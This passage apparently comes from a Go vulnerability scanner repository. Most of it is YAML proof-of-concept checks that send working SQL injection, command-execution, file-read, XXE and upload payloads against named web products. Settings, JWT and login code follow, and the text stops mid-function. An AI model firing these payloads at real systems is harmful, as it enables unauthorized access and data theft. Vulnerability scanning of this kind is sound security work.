/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt 20 | follow_redirects: false 21 | expression: | 22 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") 23 | search: | 24 | \"id\"\:\"(?P<var>.+?)\"\, 25 | - method: GET 26 | path: /file/fileNoLogin/{{var}} 27 | follow_redirects: false 28 | expression: | 29 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 30 | detail: 31 | author: mvhz81 32 | info: e-bridge-file-read for Linux 33 | links: 34 | - https://mrxn.net/Infiltration/323.html 35 | -------------------------------------------------------------------------------- /pkg/pocs/weblogic-cve-2020-14750.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-cve-2020-14750 2 | rules: 3 | - method: GET 4 | path: 
/console/images/%252E./console.portal 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && (response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console/jsp/common/NoJMX.jsp"))) 8 | detail: 9 | author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) 10 | weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 11 | links: 12 | - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html 13 | -------------------------------------------------------------------------------- /pkg/pocs/weblogic-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-ssrf 2 | rules: 3 | - method: GET 4 | path: >- 5 | /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 6 | headers: 7 | Cookie: >- 8 | publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; 9 | follow_redirects: false 10 | expression: >- 11 | response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) 12 | -------------------------------------------------------------------------------- /pkg/pocs/webmin-cve-2019-15107-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-webmin-cve-2019-15107-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /password_change.cgi 8 | headers: 9 | Referer: "{{url}}" 10 | body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 11 | follow_redirects: false 12 | expression: > 13 | 
response.body.bcontains(bytes(string(r1 + r2))) 14 | detail: 15 | author: danta 16 | description: Webmin 远程命令执行漏洞(CVE-2019-15107) 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 19 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | rules: 3 | - method: GET 4 | path: "/wp-admin/admin.php?page=download_report&report=users&status=all" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://www.exploit-db.com/exploits/48698 12 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-ext-adaptive-images-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-adaptive-images-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") 9 | detail: 10 | author: FiveAourThe(https://github.com/FiveAourThe) 11 | links: 12 | - https://www.anquanke.com/vul/id/1674598 13 | - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 14 | -------------------------------------------------------------------------------- /pkg/pocs/wordpress-ext-mailpress-rce.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-mailpress-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/wp-content/plugins/mailpress/mp-includes/action.php" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo {{r}}%2b{{r1}};?>&html=&plaintext=&mail_format=standard&autosave=1 12 | expression: "true" 13 | search: | 14 | <autosave id='(?P<id>.+?)' 15 | - method: GET 16 | path: "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id={{id}}" 17 | expression: | 18 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 19 | 20 | detail: 21 | author: violin 22 | links: 23 | - https://github.com/Medicean/VulApps/tree/master/w/wordpress/2 24 | -------------------------------------------------------------------------------- /pkg/pocs/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "wuzhicms-v4.1.0" 12 | vuln_url: "/api/sms_check.php" 13 | links: 14 | - https://github.com/wuzhicms/wuzhicms/issues/184 15 | -------------------------------------------------------------------------------- /pkg/pocs/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 
2 | rules: 3 | - method: GET 4 | path: /install/ 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: '=< Xiuno BBS 4.0.4' 13 | links: 14 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 15 | -------------------------------------------------------------------------------- /pkg/pocs/xunchi-cnvd-2020-23735-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xunchi-cnvd-2020-23735-file-read 2 | rules: 3 | - method: GET 4 | path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: ' >= V2.3' 13 | links: 14 | - http://www.cnxunchi.com 15 | - https://www.cnvd.org.cn/flaw/show/2025171 16 | -------------------------------------------------------------------------------- /pkg/pocs/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: "/admin/?a=Factory();print({{r}}%2b{{r1}});//../" 8 | expression: | 9 | response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 12 | yccms: v3.3 13 | links: 14 | - https://blog.csdn.net/qq_36374896/article/details/84839891 15 | 
-------------------------------------------------------------------------------- /pkg/pocs/yonyou-grp-u8-sqli-to-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli-to-rce 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | follow_redirects: false 9 | body: | 10 | cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET> 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://www.hackbug.net/archives/111.html 17 | -------------------------------------------------------------------------------- /pkg/pocs/yonyou-grp-u8-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | body: > 9 | cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | 
detail: 13 | author: 凉风(http://webkiller.cn/) 14 | links: 15 | - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html -------------------------------------------------------------------------------- /pkg/pocs/yonyou-nc-arbitrary-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-arbitrary-file-upload 2 | set: 3 | r1: randomInt(10000, 20000) 4 | r2: randomInt(1000000000, 2000000000) 5 | r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" 6 | r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" 7 | rules: 8 | - method: POST 9 | path: /servlet/FileReceiveServlet 10 | headers: 11 | Content-Type: multipart/form-data; 12 | body: >- 13 | {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> 14 | expression: | 15 | response.status == 200 16 | - method: GET 17 | path: '/{{r1}}.jsp' 18 | headers: 19 | Content-Type: application/x-www-form-urlencoded 20 | expression: | 21 | response.status == 200 && response.body.bcontains(bytes(string(r2))) 22 | detail: 23 | author: pa55w0rd(www.pa55w0rd.online/) 24 | Affected Version: "YONYOU NC > 6.5" 25 | links: 26 | - https://blog.csdn.net/weixin_44578334/article/details/110917053 27 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5127 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: 
/objects/getImage.php?base64Url={{payload}}&format=png 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5128.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5128 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | # TODO: url escape base64 9 | path: /objects/getImageMP4.php?base64Url={{payload}}&format=jpg 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 13 | - method: GET 14 | path: /objects/{{fileName}} 15 | follow_redirects: true 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(content)) 18 | detail: 19 | author: 0x_zmz(github.com/0x-zmz) 20 | links: 21 | - https://xz.aliyun.com/t/6708 22 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5129.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5129 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: 
| 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /pkg/pocs/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | links: 14 | - https://www.secquan.org/Prime/1069179 -------------------------------------------------------------------------------- /pkg/pocs/zabbix-authentication-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-authentication-bypass 2 | rules: 3 | - method: GET 4 | path: /zabbix.php?action=dashboard.view&dashboardid=1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.exploit-db.com/exploits/47467 -------------------------------------------------------------------------------- /pkg/pocs/zabbix-cve-2016-10134-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-cve-2016-10134-sqli 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | 
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) 11 | detail: 12 | author: sharecast 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 -------------------------------------------------------------------------------- /pkg/pocs/zcms-v3-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zcms-v3-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e") 9 | detail: 10 | author: MaxSecurity(https://github.com/MaxSecurity) 11 | links: 12 | - https://www.anquanke.com/post/id/183241 13 | -------------------------------------------------------------------------------- /pkg/pocs/zeit-nodejs-cve-2020-5284-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /_next/static/../server/pages-manifest.json 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body) 7 | detail: 8 | author: x1n9Qi8 9 | links: 10 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284 -------------------------------------------------------------------------------- /pkg/pocs/zeroshell-cve-2019-12725-rce.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-zeroshell-cve-2019-12725-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22expr%20{{r1}}%20%2b%20{{r2}}%22%0A%27 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(string(r1 + r2))) && response.status == 200 11 | detail: 12 | author: 1au 13 | links: 14 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12725 15 | -------------------------------------------------------------------------------- /pkg/pocs/zimbra-cve-2019-9670-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zimbra-cve-2019-9670-xxe 2 | rules: 3 | - method: POST 4 | path: /Autodiscover/Autodiscover.xml 5 | headers: 6 | Content-Type: text/xml 7 | body: >- 8 | ]>test@test.com&xxe; 9 | follow_redirects: false 10 | expression: | 11 | response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available") 12 | detail: 13 | author: fnmsd(https://blog.csdn.net/fnmsd) 14 | cve-id: CVE-2019-9670 15 | vuln_path: /Autodiscover/Autodiscover.xml 16 | description: Zimbra XXE Vul,may Control your Server with AdminPort SSRF 17 | links: 18 | - https://blog.csdn.net/fnmsd/article/details/88657083 19 | - https://blog.csdn.net/fnmsd/article/details/89235589 -------------------------------------------------------------------------------- /pkg/pocs/zzcms-zsmanage-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zzcms-zsmanage-sqli 2 | set: 3 | r0: randomLowercase(6) 4 | r1: randomInt(40000, 44800) 5 | r2: randomInt(40000, 44800) 6 | rules: 7 | - method: POST 8 | path: 
/user/zs.php?do=save 9 | headers: 10 | Content-Type: application/x-www-form-urlencoded 11 | body: >- 12 | proname={{r0}}&tz=1%E4%B8%87%E4%BB%A5%E4%B8%8B&prouse={{r0}}&sx%5B%5D=&sx%5B%5D=&sm={{r0}}&province=%E5%85%A8%E5%9B%BD&city=%E5%85%A8%E5%9B%BD%E5%90%84%E5%9C%B0%E5%8C%BA&xiancheng=&cityforadd=&img=%2Fimage%2Fnopic.gif&flv=&zc=&yq=&action=add&Submit=%E5%A1%AB%E5%A5%BD%E4%BA%86%EF%BC%8C%E5%8F%91%E5%B8%83%E4%BF%A1%E6%81%AF&smallclassid[]=1&smallclassid[]=2)%20union%20select%20{{r1}}*{{r2}}%23 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 16 | - method: GET 17 | path: /user/zsmanage.php 18 | follow_redirects: true 19 | expression: | 20 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 21 | detail: 22 | author: JingLing(https://hackfun.org/) 23 | version: zzcms201910 24 | links: 25 | - https://github.com/JcQSteven/blog/issues/18 26 | -------------------------------------------------------------------------------- /pkg/setting/section.go: -------------------------------------------------------------------------------- 1 | package setting 2 | 3 | import ( 4 | "time" 5 | ) 6 | 7 | type ServerSettingS struct { 8 | RunMode string 9 | HttpPort int 10 | ReadTimeout time.Duration 11 | WriteTimeout time.Duration 12 | } 13 | 14 | type AppSettingS struct { 15 | DefaultPageSize int 16 | MaxPageSize int 17 | DefaultContextTimeout time.Duration 18 | JwtSecret string 19 | PortUserDict string 20 | PortPassDict string 21 | } 22 | 23 | type DatabaseSettingS struct { 24 | DBType string 25 | UserName string 26 | Password string 27 | Host string 28 | DBName string 29 | TablePrefix string 30 | Charset string 31 | ParseTime bool 32 | MaxIdleConns int 33 | MaxOpenConns int 34 | } 35 | 36 | type MasscanSettingS struct { 37 | Rate string 38 | IpFile string 39 | IpNotScan string 40 | Port string 41 | } 42 | 43 | var sections = make(map[string]interface{}) 44 | 45 | func (s *Setting) ReadSection(k string, v interface{}) error { 46 | err := 
s.vp.UnmarshalKey(k, v) 47 | if err != nil { 48 | return err 49 | } 50 | 51 | if _, ok := sections[k]; !ok { 52 | sections[k] = v 53 | } 54 | return nil 55 | } 56 | 57 | func (s *Setting) ReloadAllSection() error { 58 | for k, v := range sections { 59 | err := s.ReadSection(k, v) 60 | if err != nil { 61 | return err 62 | } 63 | } 64 | 65 | return nil 66 | } 67 | -------------------------------------------------------------------------------- /pkg/setting/setting.go: -------------------------------------------------------------------------------- 1 | package setting 2 | 3 | import ( 4 | "github.com/spf13/viper" 5 | ) 6 | 7 | type Setting struct { 8 | vp *viper.Viper 9 | } 10 | 11 | func NewSetting(configs ...string) (*Setting, error) { 12 | vp := viper.New() 13 | vp.SetConfigName("config") 14 | for _, config := range configs { 15 | if config != "" { 16 | vp.AddConfigPath(config) 17 | } 18 | } 19 | vp.SetConfigType("yaml") 20 | err := vp.ReadInConfig() 21 | if err != nil { 22 | return nil, err 23 | } 24 | 25 | s := &Setting{vp} 26 | return s, nil 27 | } 28 | -------------------------------------------------------------------------------- /pkg/third/xray_linux_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/pkg/third/xray_linux_amd64 -------------------------------------------------------------------------------- /pkg/utils.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "crypto/md5" 5 | "fmt" 6 | "io" 7 | "linglong/models" 8 | "sync" 9 | ) 10 | 11 | var ( 12 | aliveIpList []models.IpAddr 13 | mutex sync.Mutex 14 | ) 15 | 16 | func init() { 17 | aliveIpList = make([]models.IpAddr, 0) 18 | } 19 | 20 | func MD5(s string) (m string) { 21 | h := md5.New() 22 | io.WriteString(h, s) 23 | return fmt.Sprintf("%x", h.Sum(nil)) 24 | } 25 | 26 | func MakeTaskHash(k string) 
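string {
	hash := MD5(k)
	return hash
}
-------------------------------------------------------------------------------- /pkg/utils/jwt.go: --------------------------------------------------------------------------------
package utils

import (
	"errors"
	"fmt"
	"time"

	"github.com/dgrijalva/jwt-go"
)

// tokenLifetime is how long an issued token stays valid.
const tokenLifetime = 3 * time.Hour

// jwtSecret is the HMAC key used to sign and verify tokens.
// SECURITY: the literal below is the repository's published default, so any
// deployment that still uses it is signing with a key that is effectively
// public. Call SetJwtSecret at startup with the configured value (the config
// struct AppSettingS already carries a JwtSecret field for this purpose).
var jwtSecret = []byte("213123dd1")

// SetJwtSecret replaces the signing key used by GenerateToken and ParseToken.
// It must be called before the first token is issued or parsed. An empty key
// is rejected so a misconfigured deployment cannot silently sign with "".
func SetJwtSecret(secret []byte) error {
	if len(secret) == 0 {
		return errors.New("jwt secret must not be empty")
	}
	jwtSecret = secret
	return nil
}

// Claims is the JWT payload.
//
// Password is kept only so existing code that type-asserts *Claims still
// compiles; GenerateToken no longer fills it. A JWT payload is base64url
// encoded, not encrypted, so anyone holding the token (browser storage,
// proxies, logs) could otherwise read the user's password straight out of it.
type Claims struct {
	Username string `json:"username"`
	Password string `json:"password,omitempty"` // Deprecated: always empty in tokens issued by GenerateToken.
	jwt.StandardClaims
}

// GenerateToken issues an HS256-signed token for username that expires after
// tokenLifetime. The password parameter is accepted for interface
// compatibility but is deliberately not embedded in the token (see Claims).
// It returns the compact serialized token, or the error from signing.
func GenerateToken(username, password string) (string, error) {
	now := time.Now()
	claims := Claims{
		Username: username,
		StandardClaims: jwt.StandardClaims{
			IssuedAt:  now.Unix(),
			ExpiresAt: now.Add(tokenLifetime).Unix(),
			Issuer:    "linglong",
		},
	}
	return jwt.NewWithClaims(jwt.SigningMethodHS256, claims).SignedString(jwtSecret)
}

// ParseToken verifies token's signature, signing method and registered claims
// (expiry, etc.) and returns the decoded claims. Any failure yields a nil
// *Claims and a non-nil error; it never returns (nil, nil).
func ParseToken(token string) (*Claims, error) {
	parsed, err := jwt.ParseWithClaims(token, &Claims{}, func(t *jwt.Token) (interface{}, error) {
		// Only the HMAC family we sign with may be verified against the shared
		// secret; a token whose header names any other method is rejected here
		// instead of being checked with the wrong key type.
		if _, ok := t.Method.(*jwt.SigningMethodHMAC); !ok {
			return nil, fmt.Errorf("unexpected signing method: %v", t.Header["alg"])
		}
		return jwtSecret, nil
	})
	if err != nil {
		return nil, err
	}
	claims, ok := parsed.Claims.(*Claims)
	if !ok || !parsed.Valid {
		return nil, errors.New("invalid token")
	}
	return claims, nil
}
-------------------------------------------------------------------------------- /pkg/utils/pagination.go: --------------------------------------------------------------------------------
package utils

import (
	"strconv"

	"github.com/gin-gonic/gin"
)

// GetPage converts the pagenum/pagesize query parameters into a zero-based row
// offset, (pagenum-1)*pagesize. A missing, non-numeric, zero or negative value
// for either parameter yields offset 0, so callers are never handed a negative
// offset built from untrusted input.
//
// NOTE(review): pagesize is not capped here; the config struct AppSettingS has a
// MaxPageSize field but it is not reachable from this package.
func GetPage(c *gin.Context) int {
	pagesize, _ := strconv.Atoi(c.Query("pagesize"))
	page, _ := strconv.Atoi(c.Query("pagenum"))
	if page <= 0 || pagesize <= 0 {
		return 0
	}
	return (page - 1) * pagesize
}
-------------------------------------------------------------------------------- /routers/api/auth.go: --------------------------------------------------------------------------------
package api

import (
	"log"
	"net/http"

	"github.com/astaxie/beego/validation"
	"github.com/gin-gonic/gin"

	"linglong/models"
	"linglong/pkg/e"
	"linglong/pkg/utils"
)

// auth carries the login fields through beego validation.
type auth struct {
	Username string `valid:"Required; MaxSize(50)"`
	Password string `valid:"Required; MaxSize(50)"`
}

// credential returns the named login field, preferring the request body over
// the query string. Credentials placed in a URL end up in access logs, browser
// history and Referer headers, so clients should send them in a POST body; the
// query-string fallback is kept only so existing GET clients keep working.
func credential(c *gin.Context, name string) string {
	if v := c.PostForm(name); v != "" {
		return v
	}
	return c.Query(name)
}

// GetAuth validates username/password, checks them with models.CheckAuth and,
// on success, responds with code SUCCESS and data["token"]. Validation
// failures respond INVALID_PARAMS (each error is logged); a failed login and a
// token-signing failure both respond ERROR, so the reply does not distinguish
// an unknown username from a wrong password.
func GetAuth(c *gin.Context) {
	username := credential(c, "username")
	password := credential(c, "password")

	valid := validation.Validation{}
	a := auth{Username: username, Password: password}
	ok, _ := valid.Valid(&a)

	data := make(map[string]interface{})
	code := e.INVALID_PARAMS
	switch {
	case !ok:
		for _, err := range valid.Errors {
			log.Println(err.Key, err.Message)
		}
	case !models.CheckAuth(username, password):
		code = e.ERROR
	default:
		token, err := utils.GenerateToken(username, password)
		if err != nil {
			code = e.ERROR
		} else {
			data["token"] = token
			code = e.SUCCESS
		}
	}

	c.JSON(http.StatusOK, gin.H{
		"code": code,
		"msg":  e.GetMsg(code),
		"data": data,
	})
}
-------------------------------------------------------------------------------- /routers/api/v1/log.go: --------------------------------------------------------------------------------
package v1

import (
	"github.com/gin-gonic/gin"
	"linglong/models"
	"linglong/pkg/e"
	"linglong/pkg/utils"
	"net/http"
)

//任务列表
func GetLogList(c *gin.Context) {
	name := c.Query("name")

	maps := make(map[string]interface{})
	data := make(map[string]interface{})

	if name != "" {
		maps["name"] =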
